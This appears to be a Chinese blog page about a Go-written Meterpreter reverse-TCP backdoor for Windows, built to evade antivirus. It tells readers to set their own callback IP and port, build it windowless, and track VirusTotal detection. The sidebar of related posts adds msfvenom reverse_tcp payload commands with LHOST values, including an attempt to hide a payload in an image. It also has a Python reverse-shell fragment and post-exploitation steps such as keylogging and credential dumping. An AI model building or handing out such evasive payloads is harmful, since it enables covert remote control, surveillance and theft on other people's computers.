Golang实现的x86下的Meterpreter reverse tcp

最新推荐文章于 2024-05-15 09:53:52 发布
原创 最新推荐文章于 2024-05-15 09:53:52 发布 · 236 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

这篇博客介绍了如何使用Golang编写一个x86架构的Meterpreter reverse tcppayload,并进行了静态免杀优化。作者修改了EGESPLOIT项目代码以减小编译后程序的大小,目前约为1.2MB。通过调整go_meterpreter.go中的IP和端口,用户可以自行编译。文章还提及了免杀效果,编译后的程序在 VirusTotal 上的查杀率从最初的8/62降低到20/70,但Windows 10内置杀毒软件仍可能通过动态行为检测拦截该程序。

Golang实现的x86下的Meterpreter reverse tcp。地址:https://github.com/insightglacier/go_meterpreter

做静态免杀实验,代码修改自EGESPLOIT 这个开源项目。单独实现主要在于减小程序编译后体积。目前编译后的大小在1.2M左右。

使用方法

修改go_meterpreter.go中125行代码 s := "http://192.168.121.131:8989" IP和端口修改为自己的地址。然后就可以go build了。

set GOARCH=386
go build -ldflags="-H windowsgui -w"

注意上面参数中没有-s,因为实际测试,使用这种方式build后的程序免杀效果会好一些。如果直接go build,程序会有窗口,同时大小也在1.6M左右。

由于加入了这部分代码,运行后因为执行多次无用代码,需要等一会才可以看到上线。另外目前会出现连接两次msf的情况,但是只有一个连接会返回shell,目前没找到原因。

免杀效果

加入了Bypass AV的代码。

我在刚写好的时候上传到VT,查杀结果位8/62。VT上有超过70个引擎,62个应该是加入BypassAV代码起的作用。

今天最新经过编译查杀结果为20/70。由于现在杀毒都有云查杀,刚写的时候效果好,但是过几天就被被杀。这里具体可以结合一些其他方式来尝试绕过。

VT检测结果地址:

最低0.47元/天 解锁文章
kali-捆绑应用程序
乌托托的博客
12-19 1062
kali捆绑应用程序
渗透测试-[Meterpreter后渗透25招]
m0_43405474的博客
05-07 3592
渗透测试-[后渗透25招]0.实验环境1.MS08-067漏洞描述【RPC】2.主机发现3 利用MSF通过ms08-067漏洞渗透目标系统4.后渗透利用4.1.系统信息搜集(1)获取系统基本信息(2)判断目标系统是否为虚拟机(3)磁盘分区情况(4)目标软件安装情况(5)其他信息搜集4.2查看权限4.3 进入目标系统Shell4.4 添加账号4.5 将新账号添加到管理员组中4.6 截屏4.7 文件上传4.8 下载文件4.9 获取口令hash4.10 摄像头4.11 键盘监听(1) ps找到合适的进程进行迁移(
Metasploit中meterpreter/reverse_tcp+exploit/multi/handler攻击实战教程
Amdy_amdy的博客
08-23 3469
Metasploit中meterpreter/reverse_tcp+exploit/multi/handler攻击实战教程 由于是实战,肯定要一个服务器对吗?为了不搞破坏,我这里就不用服务器了。我现在已经用另一台电脑搭建了一个网站(用phpstudy快速搭建的),这台电脑IP是:192.168.1.103; 我用的是渗透测试系统Kali Linux,由于此系统是自带Metasploit,我的Kali Linux系统IP是:192.168.40.132,并且能够通过火狐浏览器正常访问到192.168.1
reverse-tunnel:反向隧道TCP和UDP
05-06
反向隧道TCP和UDP rtun是用于通过公共网关服务器将TCP和UDP端口公开给Internet的工具。 您可以在防火墙和NAT之后的计算机上公开ssh和mosh服务器。 建造 中提供了已编译的二进制文件。 要构建自己的存储库,请克隆存储库并进行以下操作: $ git clone https://github.com/snsinfu/reverse-tunnel $ cd reverse-tunnel $ make 或者, $ go build -o rtun github.com/snsinfu/reverse-tunnel/agent/cmd $ go build -o rtun-server github.com/snsinfu/reverse-tunnel/server/cmd 码头工人 Docker映像可用: 快速使用: $ docker run -it \ -
用Python写Reverse TCP 后门
IsTr33叨逼叨
11-09 479
看见一个老外用Python写的Reverse TCP后门。 小小修改了一下,让它支持Windows。 reverseTcp.py: #!/usr/bin/env python import socket, sys host = sys.argv[1] # Attacker's host address, usually '' port = int(sys.argv
推荐开源项目:ReverseTCP Shell - 动态渗透测试工具
gitblog_00047的博客
05-15 477
推荐开源项目:ReverseTCP Shell - 动态渗透测试工具 1、项目介绍 ReverseTCP Shell 是一个强大的渗透测试框架,专为安全研究人员和白帽黑客设计,用于模拟攻击者与被控制的远程主机之间的交互。该项目提供了一系列实用的模块,包括查看服务器模块、获取远程主机信息、文件上传下载以及截屏功能,以帮助安全专家在合法的安全测试中更有效地进行漏洞评估和利用。 2、项目技术分析 Re...
外网电脑通过Frp穿透IPC设备需要用到的golang和frp源码
03-11
标题中的“外网电脑通过Frp穿透IPC设备需要用到的golang和frp源码”意味着我们要探讨的是如何利用Golang编程语言和Frp(Frugal Reverse Proxy)工具,实现外网计算机通过IPC(Industrial Personal Computer,工业...
生成时出现了如下问题:msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.14.118.172 LPORT=4444 -f png -x /path/to/clean_image.png -o malicious_image.png [*] exec: msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.14.118.172 LPORT=4444 -f png -x /path/to/clean_image.png -o malicious_image.png Overriding user environment variable 'OPENSSL_CONF' to enable legacy functions. Error: invalid format: png Framework Executable Formats [--format <value>] =============================================== Name ---- asp aspx aspx-exe axis2 dll ducky-script-psh elf elf-so exe exe-only exe-service exe-small hta-psh jar jsp loop-vbs macho msi msi-nouac osx-app psh psh-cmd psh-net psh-reflection python-reflection vba vba-exe vba-psh vbs war Framework Transform Formats [--format <value>] ============================================== Name ---- base32 base64 bash c csharp dw dword go golang hex java js_be js_le nim nimlang num perl pl powershell ps1 py python raw rb ruby rust rustlang sh vbapplication vbscript
06-22
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f raw > payload.bin # 使用exe2image工具封装 python3 -m pip install exe2image exe2image -i payload.bin -o payload.png -c /...
Error: invalid format: efi Framework Executable Formats [--format <value>] =============================================== Name ---- asp aspx aspx-exe axis2 dll ducky-script-psh elf elf-so exe exe-only exe-service exe-small hta-psh jar jsp loop-vbs macho msi msi-nouac osx-app psh psh-cmd psh-net psh-reflection python-reflection vba vba-exe vba-psh vbs war Framework Transform Formats [--format <value>] ============================================== Name ---- base32 base64 bash c csharp dw dword go golang hex java js_be js_le masm nim nimlang num octal perl pl powershell ps1 py python raw rb ruby rust rustlang sh vbapplication vbscript zig ┌──(root㉿kali)-[/home/kali] └─# # 生成 EFI Payload msfvenom --arch x64 --platform windows -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f efi -o /root/efi_payload.efi # 验证文件是否生成成功 if [ -f "/root/efi_payload.efi" ]; then echo "EFI Payload 文件已成功生成!" else echo "EFI Payload 文件生成失败,请检查参数配置。" fi Error: invalid format: efi Framework Executable Formats [--format <value>] =============================================== Name ---- asp aspx aspx-exe axis2 dll ducky-script-psh elf elf-so exe exe-only exe-service exe-small hta-psh jar jsp loop-vbs macho msi msi-nouac osx-app psh psh-cmd psh-net psh-reflection python-reflection vba vba-exe vba-psh vbs war Framework Transform Formats [--format <value>] ============================================== Name ---- base32 base64 bash c csharp dw dword go golang hex java js_be js_le masm nim nimlang num octal perl pl powershell ps1 py python raw rb ruby rust rustlang sh vbapplication vbscript zig EFI Payload 文件生成失败,请检查参数配置。
最新发布
06-24
msfvenom --arch x64 --platform windows -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f efi -o /root/efi_payload.efi ``` #### 检查输出路径和文件名 确保指定的输出路径和文件名...
Meterpreter命令详解
weixin_43803070的博客
07-10 1623
文章讲的比较浅显易懂,比较深奥的东西我就不写了。 0x01初识Meterpreter 1.1.什么是Meterpreter Meterpreter是Metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell的链接。Meterpreter shell作为渗透模块...
msf的reverse_tcp和bind_tcp两者的区别
HoAd'blog
07-31 6889
msf的reverse_tcp和bind_tcp两者的区别reverse_tcpbind_tcpreverse_httpreverse_https安全性 reverse_tcp 攻击机设置一个端口(LPORT)和IP(LHOST),Payload在测试机执行连接攻击机IP的端口,这时如果在攻击机监听该端口会发现测试机已经连接。 msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=0.0.0.0 lport=4444 -f elf -o shell bi
渗透测试常用工具-使用meterpreter模块进行后渗透测试
我是网络安全兼技能大赛工程师,专注网络安全技术学习与技能大赛实战!持续分享最新的技术文章,帮你少走弯路,一起在技术赛道上进步~
10-24 1742
再然后使用命令keyscan_start对键盘进行监听,使用命令keyscan_dump保存截获的键盘信息(注:windows会话窗口的概念,windows桌面划分为不同的会话(session),以便于与windows交互。第五步,使用info windows/meterpreter/reverse_tcp命令来查看攻击载荷模块的具体信息,该模块适用于Windows x86平台不需要admin权限便可以运行,大小为281字节,需要配置三个参数分别为退出的方式、监听的地址、监听的端口号、EXITFUNC。
渗透测试 ( 4 ) --- Meterpreter 命令详解
freeking101的博客
07-02 1万+
Meterpreter 是 Metasploit 框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell 的链接。Meterpreter shell 作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开 shell、得到用户密码、上传下载远程主机的文件、运行 cmd.exe、捕捉屏幕、得到远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络.
metasploit中Payload的reverse_tcp和bind_tcp的区别
热门推荐
04-19 1万+
bind_tcpreverse_tcp这两者的执行过程可以d
Reverse_tcp反向连接获得shell实验
把梦想放飞在蓝色的天空里...
08-08 1万+
Reverse_tcp反向连接获得shell实验 准备工作: VMWare的桥接模式: 这是一种很重要的模式,如图: 设置成桥接模式后,设置虚拟机里的ip地址时,其地址可以跟外边主机在同一个网段,同一个DNS,同样的掩码,虚拟机就相当于局域网里的另一台主机。 如果双方的防火墙都关闭了的话,主机和虚拟机是可以相互ping通的。 虚拟机还可以访问互联网,使用起来相当的方便。   简
记录一次linux内网完整渗透测试
NZXHJ的博客
07-18 4237
记录一次完整系统的linux内网渗透测试
信息安全技术(二)-- 利用 metasploit 创建并反弹 shell
yi23456qi的博客
06-19 656
知识是不断从学习中得到的,经验是从尝试中得到的!
Golang实现简单TCP代理教程
本文将详细介绍如何使用Golang实现一个简单的TCP代理程序,以及如何克隆和安装该程序包和可执行文件。同时,本文也会阐述TCP代理的基本概念,以及在实际应用中需要注意的事项。 首先,我们来理解TCP代理的基本含义...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值